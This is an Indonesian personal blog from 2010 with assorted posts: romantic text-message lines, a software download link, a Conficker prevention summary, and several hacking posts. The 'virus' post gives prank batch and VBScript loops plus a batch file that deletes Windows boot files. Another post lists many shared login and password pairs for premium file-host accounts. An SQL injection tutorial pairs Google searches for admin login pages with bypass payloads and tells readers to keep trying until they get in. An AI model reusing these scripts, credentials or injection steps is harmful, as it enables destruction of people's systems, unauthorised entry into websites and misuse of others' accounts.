Minggu, 28 November 2010

selingan yukkk...
baggi kaum cowok,sekedar share ajja nie,....
sample sms puitis abizzz bak pujangga yang lagi nyari rokok...
hhehehheeee
di liat ajja...
di ambil juga boleh koQ

namanya juga kata-kata romantis
hhee
selingan yukkk...
baggi kaum cowok,sekedar share ajja nie,....
sample sms puitis abizzz bak pujangga yang lagi nyari rokok...
hhehehheeee
di liat ajja...
di ambil juga boleh koQ
kumpulan sms cinta yg meluluhkan hati

Seperti berobat, yang terpenting bukan obatnya, tapi keinginanmu untuk sembuh. Begitu pula menaklukkan hati, yang terpenting bukan ungkapannya, tapi kesungguhanmu untuk mencintainya.

Semoga lekas sembuh, eh, jatuh!

(1) Tadi malam aku kirim bidadari untuk menjaga tidurmu. Eh, dia buru-buru balik. Katanya, ‘Ah, masa bidadari disuruh jaga bidadari?’

(2) Kalau kamu nanya berapa kali kamu datang ke pikiranku, jujur aja, cuma sekali. abisnya, ga pergi2 sih!

(3) Sempet bingung jg, kok aku bisa senyum sendiri. Baru nyadar, aku lagi mikirin kamu.

(4) Kalau suatu saat kamu hancurkan hatiku… akan kucintai kamu dengan kepingannya yang tersisa.

(5) Berusaha melupakanmu, sama sulitnya dengan mengingat seseorang yang tak pernah kukenal.

(6) Kalau kamu ajak aku melompat bareng, aku ngga bakalan mau. Mending aku lari ke bawah, bersiap menangkapmu.

(7) Aku pernah jatuhkan setetes air mata di selat Sunda. Di hari aku bisa menemukannya lagi, itulah waktunya aku berhenti mencintaimu.

(8) Ga usah janjiin bintang dan bulan untuk aku, cukup janjiin kamu bakal selalu bersamaku di bawah cahayanya.

(9) Kalau kamu nanya mana yg lebih penting buat aku: hidupku atau hidupmu, aku bakal jawab hidupku. Eits, jangan marah dulu, karena kamulah hidupku.

(10) Pertama ketemu, aku takut ngomong sama kamu. Pertama ngomong sama kamu, aku takut kalau nanti suka sama kamu. Udah suka, aku makin takut kalau jatuh cinta. Setelah sekarang cinta sama kamu, aku jadi bener2 takut kehilangan kamu. Kamu emang menakutkan!

(11) Ketika hidup memberiku seratus alasan untuk menangis, kau datang membawa seribu alasan untuk tersenyum.

(12) Jika aku bisa jadi bagian dari dirimu, aku mau jadi airmatamu, yang tersimpan di hatimu, lahir dari matamu, hidup di pipimu, dan mati di bibirmu

(13) Wah, ini angka sial. Udah dulu ya… Soal sms-sms itu, ga usah nanya dari mana sumbernya, selama Anda bisa membuatnya datang dari hati.

(14) Plis aku butuh bantuan kamu. Soalnya, kunci buat membuka pintu kebahagiaanku, ga tau napa, ada padamu.

(15) Ketika mencintaimu, aku mendapat kekuatan. Mendapat cintamu, aku beroleh keberanian. Kamu wonderwoman, yang membuatku ngerasa jadi superman. Kalimat terakhir bisa dibalik sesuai keperluan. Atau diulang, kalo kamu berdua makhluk sejenis, kek kasus Ryan .

(16) Ayolah tinggal sesukamu di dalam hatiku. Janji, aku ngga bakalan ngutip uang kontrakan.

(17) Cintaku denganmu memang tak akan berkahir bahagia, karena yang kutawarkan untukmu adalah cinta yang tak punya akhir.

(18) Izinkan aku membaca nada-nada di dalam jiwamu, untuk kunyanyikan saat kau mungkin sudah lupa lirik-liriknya.

(19) Katanya orang bisa jadi bodoh karena cinta, tapi aku ngga peduli itu. Aku cuma mikir, betapa bodohnya mantanmu, yang berhenti mencintaimu.

(20) Kau begitu kucinta, hingga ketika bersamamu mati seperti bisa kutunda, dan tanpamu, hidup serasa tiada guna.

(21) Senyummu seperti sebuah undangan buat imajinasiku, untuk terbang sejauh-jauhnya, berkembang seliar-liarnya.

(22) Aku tak pernah tau kebahagiaan sesungguhnya, sampai ketika aku mendapatkan cintamu. Dan aku tak pernah tau derita sebenarnya, sampai aku kini kehilangan itu. Terima kasih telah mengenalkanku pada kedua rasa yang tak akan kulupa.

(23) Jika aku ngga bisa mencintaimu seperti yang kamu inginkan, bukan berarti aku ngga mencintaimu dengan semua yang kupunya.

(24) Haruskah aku tersenyum penuh bahagia karena menjadi sahabatmu, atau menangis dalam perih derita, karena tak bisa lebih dari itu.

(25) Di antara jemarimu, diciptakan ruang kosong, agar ada tempat untuk diisi oleh jemariku.

(26) Jangan bilang kamu mencintaiku, kecuali dengan kesungguhan. Karena bisa saja aku melakukan hal yang paling gila, dengan mempercayainya.

(27) Memikirkanmu, aku jadi malas tidur. Soalnya, hidupku kini jauh lebih indah dari impian manapun.

(28) Aku selalu berusaha tak menangis karenamu, karena setiap butir yang jatuh, hanya makin mengingatkan, betapa aku tak bisa melepaskanmu.

(29) Kamu ga pernah bisa kuusir dari pikiranku. Ya udah, mungkin tempatmu emang di sana.

(30) Ketika kamu menutup diri, aku tau bukan untuk membuatku pergi. Kamu cuma ingin tahu, apakah aku cukup kuat untuk membukanya. (Yang ini sok PD kekna ya)

(31) Aku sadar, mencintaimu sama saja menyerahkan padamu kekuatan untuk menghancurkanku. Tapi aku percaya, kau tak akan menggunakannya untuk itu.

(32) Kamu tau, napa aku sedih tadi malam? Aku duduk di dekat seseorang yang paling berarti buatku, namun aku sadar baginya aku mungkin tak berarti apapun. (Yang ini, kalo dia punya rasa dikiiiit aja, pasti dibales deh).

(33) Tak mungkin aku berhenti mencintaimu. Aku hanya bisa belajar hidup tanpamu.

(34) Aku ingat kamu ketika seneng, karena aku selalu ingin berbagi kebahagiaan denganmu. Ingat kamu ketika sedih, karena kamu orang yang selalu mengerti perasaanku. Ingat kamu ketika ketawa ato nangis, karena kamu selalu membuat tawaku semakin lebar, dan membuat air mataku berhenti keluar.

(35) Walau kau buat aku menangis, aku tetap mengkhawatirkan keadaanmu. Walau kau semakin acuh, aku malah makin merindukanmu. Bahkan jika kau sebenarnya telah beralih kepada yang lain, aku akan berusaha berbahagia untukmu.

(36) Gimana kalo kita berdua jadi komplotan penjahat: Aku mencuri hatimu, dan kamu mencuri hatiku…

(37) Mereka bilang waktu akan mengobati semuanya. Masalahnya, tanpa kamu di sini, waktu seperti berhenti.

(38) Kamu membuatku tersenyum, tanpa sebab apapun. Membuatku tertawa, walau tak ada yang lucu. Sialnya, kamu juga membuatku jatuh, pada saat aku semestinya menjauh.

(39) Aku tak mungkin bisa mengatasi semua masalah yang menimpamu. Tapi aku janji, bakal selalu bersamamu untuk menghadapinya.

(40) Tadi malem, pas mikirin kamu, air mataku netes. Aku nanya napa dia keluar. Katanya, “Ada yang penting banget kykna di mata kamu, segitu pentingnya sampe ga ada tempat buat aku. Ya udah, mending aku keluar aja”

(41) Hari ini aku menangis bukan karena merindukanmu, atau mendambamu kembali. Tapi karena akhirnya aku sadar, aku bakal baik-baik saja tanpamu.

(42) Napa aku ga pernah bisa membencimu, saat kamu buat perasaanku tercabik-cabik?

(43) Dulu aku heran, napa orang sampe berantem ‘hanya’ karena cinta. Trus aku inget muka kamu, dan tiba-tiba, aku merasa siap menghadapi Perang Dunia Ketiga.

(44) Sejujurnya, kadang aku sembunyi, karena ingin kamu temukan. Menjauh karena ingin kamu ikuti. Menangis karena ingin kamu tenangkan. Menjatuhkan diri, karena ingin kamu tangkap.

(45) Aku pengen bersamamu cuma pada dua waktu: SEKARANG dan SELAMANYA.

(46) Jangan GR deh. Aku kangen kamu sedikit aja kok. Sedikit berlebihan maksudnya. (Untuk menghormati Valentino Rossi, pembalap pujaanku yg selalu pake nomor ini, sampe di sini dulu ya…)

(47) Andai sebuah bintang akan jatuh setiap kali aku mengingatmu, bulan pasti protes. Soalnya dia bakal sendirian di angkasa.

(48) Kamu selalu punya cara buat aku ketawa, saat aku bahkan lagi ngga pengen tersenyum. Gila kamu ya!

(49) Kamu membuatku sekarang ngerti, hal paling sakit itu bukan sendiri, tp dilupakan seseorang yang ngga bisa aku lupakan.

(50) Selama ini aku ngga nyadar kalo namaku ternyata keren juga, sampe saat aku denger sendiri kamu membisikkannya.

(51) Cuma ada satu masalah ketika aku bermimpi tentangmu… ketika aku harus terbangun.

(52) Temen-temenku nanya, apa sih yang aku lihat di diri kamu? Aku diem aja. Soalnya, kalau aku cerita, bisa-bisa mereka bakal suka juga.

(53) Cuma dengan mikirin besok masih bisa sama kamu, kayaknya gampaaang banget melalui hari ini.

(54) Aku yakin bisa menaklukkan dunia hanya dengan satu tangan, selama kamu menggenggam erat tanganku yang satu lagi.

(55) Aku akan berhenti mencintaimu, ketika berlian tak lagi berkilau, bunga tak lagi bersemi, petir tak lagi bergemuruh, sungai tak lagi mengalir, bintang tak lagi bersinar, pelangi tak lagi membias. Ah, ngga juga. Kalaupun itu terjadi, aku tak akan berhenti.

(56) Aku nggak menangis karena kehilanganmu, tapi mengetahui kau tak pernah berusaha mencegahku pergi.

(57) Kenapa aku tetap menginginkanmu walau kamu tak pernah punya rasa yang sama. Masalahnya, begitu sulit membuatmu mencintaiku, lebih sulit lagi memaksa hatiku berhenti memikirkanmu.



cukup ywa....
kurang???
langsung beri ajja ntu cewek...
hhiii
by Dwipangga

virus???
sapa takut???
hhehheee...
maksdnya apa nie...
kita tengok skema bikin virus nyok...
mulai dari yang ecek"

virus???
sapa takut???
hhehheee...
maksdnya apa nie...
kita tengok skema bikin virus nyok...
mulai dari yang ecek"

nie hanya sekedar virus yang menggunakan script ajja

Bikin message yang nongol terus-terusan...

@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC lo kaya'y ngaco....
msg * Udah install ulang aja.....
msg * Biar masalah nya kelar....
msg * Wkwkwkwkwkkkkkkkk....
GOTO BEGIN

save namafile ( .BAT )

- Kejadian yg udah2 biar katA d kill d task manager, masih tetep ja nongol ntu message

Bikin Shutdown trus da Message'y...

@ECHO off
msg * -=WARNING=-
shutdown -s -c "Error !!!"

save namafile ( .BAT )

Maenin Caps Lock...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save namafile ( .vbs )

Maenin CD/DVD biar buka tutup mulu...

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile ( .vbs )

Bikin vbscript nongol mlulu...

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save namafile ( .vbs )

- Kejadian yg udah2 d task manager jd full wscript yg lg running

Bikin tombol Backspace neken mlulu...

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save namafile ( .vbs )

Bikin otomatis ngetik "Erorr!!!" di notepad/word...

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Erorr!!!"
loop

save namafile ( .vbs )

Bikin supaya buka notepad mlulu...

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save namafile ( .BAT )

- Ati2 cz ni script klo mnurut w pling ngeselin bgt....
- Klo mw yg kluar bkn notepad tinggal rubah ja DIR'y....

Bikin supaya setiap buka notepad otomatis ngetik apa yg ente mau...

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "E"
WScript.Sleep 50
WshShell.SendKeys "R"
WScript.Sleep 50
WshShell.SendKeys "O"
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"

save namafile ( .vbs )



Cara shut down selama'a
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save dengan ekstensi .bat

sekian dulu dweh.....
sebenarnya masih banyak cara bikin virus...
tapi nie awal ajja koQ
hheeee...

by Dwipangga




hhee....
eng ing eng...
yang di tunggu"
download gratis microsoft office 2010
udah tau donk power software kluaran microsoft ini...
yukk mari,...


hhee....
eng ing eng...
yang di tunggu"
microsoft office 2010
udah tau donk power software kluaran microsoft ini...
yukk mari,...

sebenernya banyak fungsional lebih dari ms.office 2010
gw make sich enjoy ajje..
mantab pula
susah di jelasin lewat kata" dah..
dari mulai start up ampe ending w terkesan getooh...
di coba lah...
file kurang lebih 700mb'an...(belom di extract)
jadi cari warnet tercepat yang loe tau buat nyedot nie software

by dwipangga

langsung download(sedotttttttttttt)
disini

Minggu, 21 November 2010

sebenarnya hack fb bisa pa ga ywa????

jawabannya ntu antara bisa dan tidak
kenapa???

sebenarnya hack fb bisa pa ga ywa????

jawabannya ntu antara bisa dan tidak
kenapa???
gini,sbenarnya menurut gw ntu bukan hack,tapi manipulasi data...
bingung???
klo kaya hacker ecek" macem w,kga bakal mungkin bisa ngebobol data server PT.facebook.tbk (hhehhee....maap pak facebook)
tapi bisa di akalin lewat manipulasi data client...
kasih ga ywa triknya. . .
hmmmmmm....
w sih mau kasih triknya,tapi.....
hhehhehee...
ntar w kejaring intel'a facebook lagi. . .
(hhiiiii,maap pak facebook)
sebenernya ada banyak cara buat hack fb,di antaranya lewat pihak ketiga
sempet w nyoba nego ma hacker rusia yang konon memegang lebih dari 1000 account facebookersssss. . .
tapi. . .
super medit,di tambah w kga ngarti bahasa mereka,(walaupun w lewat translator,hhehh)

ada juga trik lewat inject data. . .
tapi w juga kga ngarti sepenuhnya. . .
hhehhe
sorry,bukanya pelit ga ngasih tau triknya. . .
tp sabar,w lg matengin dulu ilmunya. . .
tunggu ajja postingan w yang lanjutan dari hack fb...
ini cuma pengantar ajja kaleee. . .
sabar ya. . .
hhehheee.....
by dwipangga

Jumat, 19 November 2010

Mungkin in yang ditunggu-tunggu oleh para bloger maupun para insan yang bergentayangan didunia internet. Bagi kamu yang udah bosen memakai domain blabla.blogspot.com , yaitu kita bisa mendapatkan domain dot com (namamu.com) secara geratis. Benarkah ini nyata? Benarkah domain dot com bener-bener gratis?

Mungkin in yang ditunggu-tunggu oleh para bloger maupun para insan yang bergentayangan didunia internet. Bagi kamu yang udah bosen memakai domain blabla.blogspot.com , yaitu kita bisa mendapatkan domain dot com (namamu.com) secara geratis. Benarkah ini nyata? Benarkah domain dot com bener-bener gratis? kayaknya sih emang bener-bener nyata dan gratis, soalnya aku sendiri lom nyoba, tapi setelah aku survey di TKP, dan hasilnya... eng..ing..eng.. kalo menurutku sih masuk akal kalo ini bener-bener gratis.

Trus kenapa mereka mau membuatkan domain dot com buat kita? padahal kan domain dot com (top level domain) itu bukan jenis domain gratisan. Gini nih kalo menurut jawabanku, kenapa kita bisa mendapatkan domain dot com gratis karena mereka akan menempatkan iklan/banner di website kita, tapi jangan kuatir bannernya akan ditempatkan dibagian bawah dari web/blog kita. Nha bagaimana? kamu tertarik mau mencobanya? silahkan daftar disini : DOMAIN DOT COM GRATIS. Oh ya ku lupa, ada beberapa persyaratan lagi yang harus dipenuhi, gini nih beberapa persyaratanya :

1. Web/blog harus memiliki postingan minimal 15 perbulan, atau we/blog kamu memiliki pengunjung minimla 100/hari
2. Kamu harus memasang banner mereka di bagian bawah web/blog kamu.
3. Tidak boleh mengandung unsur pornografi.
4. dll

Intinya syaratnya seperti itu. Nah udha nggak sabar ingin mencobanya? silahkan DAFTAR DISINI
F-Secure melaporkan Worm baru seri Downadup. Worn tersebut dapat menginfeksi computer dengan OS Windows Workstation dan Server.
Sejak akhir tahun lalu, banyak laporan dari network perusahaan terkena varian Downadup.

F-Secure melaporkan Worm baru seri Downadup. Worn tersebut dapat menginfeksi computer dengan OS Windows Workstation dan Server.
Sejak akhir tahun lalu, banyak laporan dari network perusahaan terkena varian Downadup.

Downadup dikenal juga dengan nama Conficker adalah jenis worm network. Tidak seperti biasanya worm jenis ini memang sulit dihapus, terlebih bila masuk kedalam jaringan LAN perusahaan.

Untuk mencegah serangan Worm Downadup :

* Gunakan patch Microsoft terbaru.

* Pastikan computer internal perusahaan mengupdate antivirus terbaru.

* Periksa update dari antivirus.

* Matikan AUTORUN dan AUTOPLAY untuk USB

* Pastikan password dengan kerumitan lebih tinggi.


Bila sudah terinfeksi, langkah yang perlu diambil :
Lihat langkah yang perlu diambil dari informasi perusahaan pembuat antivirus.
Larangan mengunakan USB dan matikan trafik yang tidak perlu dari Firewall
Matikan jalur LAN, karena Downadup memang cukup rumit.

Downadup mengunakan beberapa cara penyebaran. Worm Downadup mencari OS yang belum dipatch lalu mencoba menebak pasword dan menginfeksi USB flashdrive.
Masalah yang umum terjadi dari Worm Downadup adalah mengunci user account. Karena Downadup mengunakan cara acak untuk menembus password jaringan.

Ketika Downadup masuk kedalam computer, maka secara agresif Worm ini mempertahankan diri.
Seperti melakuakn restart lebih dahulu, lalu merubah Access Right ke file dan merubah kunci Registry.
Sehingga menghapus Worm Downadup menjadi semakin sulit

Worm Downadup juga mendownload versi modifikasi terbaru sendiri dengan mendownload versi perubahan yang baru.
Nama website juga mengunakan sistem generator sendiri secara alogaritma sesuai jam dan tangal.

Senin, 08 November 2010

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.
 oke,bagi yang boring ngeliat download klo udah di rapid shared.
nie,w bagiin account rpid shared yang premium punya.

tapi w ga tau ini bisa kga,Cz w lebih seneng download di 4shared.
boleh di coba yee...
hhihihihiiii



LOGIN: 31989

PASSWORD: 2310214



LOGIN: 27766

PASSWORD: 8797341



User: 18549

Password: 4646182



Login: 20145

Password: 7072148



Login: 19159

Password: 7932964



Login: 20151

Password: 773290



Login: 20366

Password: 7177185



Login: 20374

Password: 5630758



Login: 20452

Password: 3249043



LOGIN: 20949

PASSWORD: 2716739



User: 22484

Password: 358030



User: 18549

Password: 4646182



User: 18800

Password: 9496722



LOGIN: 20949

PASSWORD: 2716739



Login: 20145

Password: 7072148



Login: 19159

Password: 7932964



Login: 20151

Password: 773290



Login: 20366

Password: 7177185



Login: 20374

Password: 5630758
Login: 20452

Password: 3249043



LOGIN: 20949

PASSWORD: 2716739



User: 22484

Password: 358030



User: 18549

Password: 4646182



User: 18800

Password: 9496722



LOGIN: 20949

PASSWORD: 2716739



Login: 20145

Password: 7072148



Login: 19159

Password: 7932964



Login: 20151

Password: 773290



Login: 20366

Password: 7177185



Login: 20374

Password: 5630758



Login: 20452

Password: 3249043



di icip-icip. . . .

Minggu, 07 November 2010

Penggunaan SQL Injection server target. Bagi maniac hacker, kita semua harus taukan :) pengertian MySQL.... :D
Lansung aja:

1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.

2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection

1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.

2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?

1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.

2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.

3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.


Apa saja yang diperlukan untuk melakukan SQL Injection ?

1) Internet Exploler / Browser

2) PC yang terhubung internet

3) Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP

1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”;, {dari GET atau POST variable }

2) isikan password dengan string ’ or ’’ = ’

3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”;, { dengan SQL ini hasil selection akan selalu TRUE }

4) m aka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection


Contoh sintaks SQL Injection

1) Sintaks SQL string ‘-- setelah nama username

2) Query database awal :


Berubah menjadi :




Contoh sintaks SQL Injection

SQL Injection melalui URL, contohnya :


Penanganan SQL Injection

1) Merubah script php

2) Menggunakan MySQL_escape_string

3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php

Contoh script php semula :

$query = "select id,name,email,password,type,block from user " .

"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{

echo "<script>alert('Your account has been blocked');

document.location.href='index.php';</script>n";
exit();
}

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :

$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{

echo "<script>alert('Your account has been blocked');

document.location.href='index.php';</script>n";
exit();
}
$pass = md5($Password);

else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi ’ misal SQL injec’tion menjadi SQL injec’tion

Contoh : $kar = “SQL injec’tion”;

$filter = mySQL_escape_string($kar);

echo”Hasil filter : $filter”;

Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi ’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection

1) Masuk ke google atau browse yg lain

2) Masukkan salah satu keyword berikut

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).

4) Masukkan kode berikut :

User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)

5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.

6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.

7) Banyak variasi kode yang mungkin, antara lain :

User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :

‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;

“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION

1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.

2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).

3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.

5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking itu seni.... :) dan Hacking jg perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga2nya, yakin deh anda akan berhasil. :)

Sabtu, 06 November 2010

 bagi kalian yang punya CD program tapi mlez buat explorer buat install program
boleh nich usul. . . pke script biar simple
nulisnya  pake notepad yee


[autorun]
OPEN=SETUP.EXE
ICON=SETUP.EXE,0

shell\configure=&Configure...
shell\configure\command=SETUP.EXE   ----->tergantung nama installernya

shell\install=&Install...
shell\install\command=SETUP.EXE   ----->tergantung nama installernya





simpan dengan judul autorun.inf
save as type-nya pake yang all files(JANGAN TXT)